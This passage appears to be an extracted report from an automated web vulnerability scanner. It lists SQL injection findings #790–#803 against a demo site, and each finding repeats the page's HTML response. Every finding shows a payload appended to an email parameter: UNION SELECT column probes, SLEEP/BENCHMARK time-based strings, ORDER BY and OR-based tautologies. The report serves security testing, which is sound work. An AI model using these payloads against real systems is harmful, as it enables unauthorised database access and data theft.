src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #790\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #791\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #792\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioOR x=y#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #793\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 31337\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #794\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #795\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #796\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #797Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #798\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #799\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #800\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #801\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #802\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=x#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #803\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io\") or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 